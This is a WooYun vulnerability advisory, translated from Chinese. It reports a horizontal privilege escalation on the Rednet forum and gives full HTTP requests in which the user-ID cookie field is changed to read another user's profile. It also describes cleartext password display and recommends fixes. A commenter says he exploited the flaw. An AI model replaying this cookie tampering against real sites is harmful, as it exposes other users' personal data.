Vulnerability summary

Defect ID: wooyun-2015-0108930

Title: Horizontal privilege escalation in the Rednet forum (user sensitive information disclosure)

Vendor: Rednet (红网)

Author: 时间飞船

Submitted: 2015-04-23 17:35

Fixed: 2015-06-07 17:36

Published: 2015-06-07 17:36

Vulnerability type: Unauthorized access / permission bypass

Severity: Medium

Self-assessed rank: 6

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-04-23: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-06-07: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The Rednet forum has a horizontal privilege escalation vulnerability: any other user's profile can be viewed at will. In addition, when changing the password the new password is displayed in clear text in the interface, and after a successful registration the password is echoed back in clear text.

Details:

The profile-edit request. The user's identity is taken from the user ID carried in the client-side cookie (the Huiyuan%5FID field of the peopleRednet2010 cookie below, here 465825):

GET /EditInfor.asp HTTP/1.1
Host: people.rednet.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://people.rednet.cn/EditInfor.asp
Cookie: Hm_lvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429281476,1429369366,1429369682,1429369859; wdcid=338db40657044830; wdlast=1429369888; vjuids=67c7909da.14cc7d09008.0.89455f3a1acd9; vjlast=1429281477.1429368736.13; hiido_tod=17; hiido_ui=0.7879002586247603; hiido_lv=1429368739125; hiido_ti=1429369891704; ASPSESSIONIDSQSTCCDA=IMPOBJHAFAOJNGKJNMADGNNN; Hm_lpvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429369888; wz%5Ftype=; wz%5Fuser%5FLingdaoId=; wz%5Fuser%5FlastLoginDatetime=; wz%5Fuser%5FLoginTimes=; wz%5Fuser%5FTrueName=; wz%5FUser%5Fpass=; wz%5FUser%5FIdName=; wz%5FUser%5FID=; peopleRednet2010=userinfo=tonylee123%40%401847100837f9a043%40%40482ff55ab7bed6efd4c1b238ceb42688&Huiyuan%5FIsLogin=yes&Huiyuan%5FLastLoginDatetime=2015%2F4%2F18+23%3A01%3A52&Huiyuan%5FLoginTimes=10&Huiyuan%5FIdName=tonylee123&Huiyuan%5FID=465825
Connection: keep-alive


Proof of concept:

Change the user ID to 1 (Huiyuan%5FID=1 in the cookie):

GET /EditInfor.asp HTTP/1.1
Host: people.rednet.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://people.rednet.cn/EditInfor.asp
Cookie: Hm_lvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429281476,1429369366,1429369682,1429369859; wdcid=338db40657044830; wdlast=1429369888; vjuids=67c7909da.14cc7d09008.0.89455f3a1acd9; vjlast=1429281477.1429368736.13; hiido_tod=17; hiido_ui=0.7879002586247603; hiido_lv=1429368739125; hiido_ti=1429369891704; ASPSESSIONIDSQSTCCDA=IMPOBJHAFAOJNGKJNMADGNNN; Hm_lpvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429369888; wz%5Ftype=; wz%5Fuser%5FLingdaoId=; wz%5Fuser%5FlastLoginDatetime=; wz%5Fuser%5FLoginTimes=; wz%5Fuser%5FTrueName=; wz%5FUser%5Fpass=; wz%5FUser%5FIdName=; wz%5FUser%5FID=; peopleRednet2010=userinfo=tonylee123%40%401847100837f9a043%40%40482ff55ab7bed6efd4c1b238ceb42688&Huiyuan%5FIsLogin=yes&Huiyuan%5FLastLoginDatetime=2015%2F4%2F18+23%3A01%3A52&Huiyuan%5FLoginTimes=10&Huiyuan%5FIdName=tonylee123&Huiyuan%5FID=1
Connection: keep-alive


Another user's profile is returned:

[Screenshot 11.PNG: another user's profile data]

Password entry screen, new password shown in clear text:

[Screenshot 12.PNG: change-password form with the new password visible]

After successful registration the password is echoed in clear text:

[Screenshot 13.PNG: registration success page showing the password]

Fix recommendation:

Take the user identity from the server-side session rather than from a client-controlled cookie. Mask the new-password field on the change-password form, and do not echo the password in clear text after registration.

Copyright notice: when reposting, please credit the source: 时间飞船@乌云 (WooYun)

Responses

Vendor response:

Vendor could not be contacted, or vendor actively declined

Vulnerability rank: 8 (WooYun rating)

Vulnerability assessment:

Comments

  1. 2015-06-07 18:07 | 绽放的菊花 ( Passer-by | Rank:17 Vulnerabilities:2 | 绽放中的菊花)

    Vendor could not be contacted, or vendor actively declined

  2. 2015-06-25 11:07 | F1uYu4n ( Intern white hat | Rank:71 Vulnerabilities:14 | CTF)

    Exploited it; the "water-meter check" (real-identity lookup) succeeded